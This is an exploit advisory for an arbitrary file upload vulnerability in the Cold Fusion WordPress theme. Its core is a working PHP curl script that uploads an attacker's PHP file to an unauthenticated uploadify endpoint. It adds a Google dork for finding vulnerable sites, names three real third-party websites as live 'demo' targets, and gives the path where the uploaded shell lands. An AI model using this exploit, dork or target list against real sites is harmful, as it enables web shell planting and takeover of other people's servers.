WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability

###############################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
###############################################################


= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =

1)Exploit :
= = = = = =

<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-photo.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manuel-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php